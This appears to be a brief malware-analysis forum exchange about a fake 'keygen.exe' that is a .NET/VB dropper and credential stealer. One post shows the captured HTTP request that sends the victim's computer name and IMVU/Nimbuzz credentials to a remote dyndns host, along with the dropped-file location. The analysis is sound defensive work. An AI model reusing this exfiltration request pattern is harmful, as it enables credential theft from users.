[markusg]

keygen.exe
http://www.virustotal.com/file-scan/rep ... 1300634175
vb dropper

[Xylitol]

Code: Select all

Host: winupdate.dyndns-wiki.com
GET /api.php?key=ACAB&computer=XYLITOL-28E1A19&tool=IMVU&page=&user=&pass= HTTP/1.1
Connection: Keep-Alive

HTTP/1.1 200 OK

Microsoft Visual C# / Basic .NET [Overlay]

dropped file in %temp%: "XYLITOL-28E1A19" (computer name)

Code: Select all

Application: Nimbuzz
Username: 
Passwort: 

Application: IMVU
Username : 
Password : 

infos seem sent via url for avoid ftp/smtp connection and transmit in clear user/password.